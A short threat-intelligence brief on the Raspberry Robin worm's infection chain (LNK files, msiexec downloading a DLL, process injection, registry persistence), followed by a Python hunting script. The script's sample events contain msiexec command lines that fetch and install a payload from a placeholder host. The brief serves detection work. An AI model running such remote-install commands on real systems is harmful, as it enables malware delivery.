2022-07-13

Researchers Found Infection Chain in USB Devices and Shared Folders

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason shared an infection chain involving Raspberry Robin, a malware worm that is often distributed through infected USB devices or shared folders. Although it is commonly observed infecting victims through Microsoft shortcut (LNK) files, the delivery method has varied "through file archives, removable devices (USB) or ISO files." The LNK file calls on the Windows command shell to spawn msiexec.exe, which proxies the download of a malicious DLL file. To maintain stealth, the malware injects itself into three processes, often rundll32.exe, regsvr32.exe, and dllhost.exe. Persistence is established through the registry run key.
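
One way to hunt for the msiexec.exe stage described above is to flag process-creation events in which cmd.exe launches msiexec.exe with an http(s) URL on its command line. This is an added example, not code from Cybereason or Anvilogic; the event field names, host names and URLs are constructed for illustration.

```python
import re

# Constructed sample process-creation events (field names are assumptions,
# loosely modelled on Sysmon Event ID 1). Hosts and URLs are placeholders,
# not indicators from the report.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec /q /i http://example.invalid:8080/placeholder"},
    {"host": "ws-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r'msiexec.exe /i "C:\Installers\app.msi"'},
    {"host": "ws-03", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\MSIEXEC.EXE",
     "command_line": "MsIeXeC -Q -I hTTps://example.invalid/placeholder"},
    {"host": "ws-04", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\ping.exe",
     "command_line": "ping http://example.invalid"},
]

# Windows image names and URL schemes are case-insensitive, so match that way.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def remote_msiexec_url(event):
    """Return the URL if cmd.exe spawned msiexec.exe with a remote source, else None."""
    if basename(event["image"]) != "msiexec.exe":
        return None
    if basename(event["parent_image"]) != "cmd.exe":
        return None
    match = URL_RE.search(event["command_line"])
    return match.group(0) if match else None

def detect(events):
    """Collect (host, url) pairs for every event that matches the pattern."""
    hits = []
    for event in events:
        url = remote_msiexec_url(event)
        if url:
            hits.append((event["host"], url))
    return hits

if __name__ == "__main__":
    for host, url in detect(SAMPLE_EVENTS):
        print(f"ALERT {host}: cmd.exe -> msiexec.exe fetching {url}")
```

Legitimate software deployment can also install MSI packages from a URL, so hits from this check need triage against known installer sources.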

Anvilogic Scenario:

  • Raspberry Robin Abuses MsiExec

Anvilogic Use Cases:

  • Compressed File Execution
  • Symbolic OR Hard File Link Created
  • Msiexec Abuse
  • Rare Remote Thread
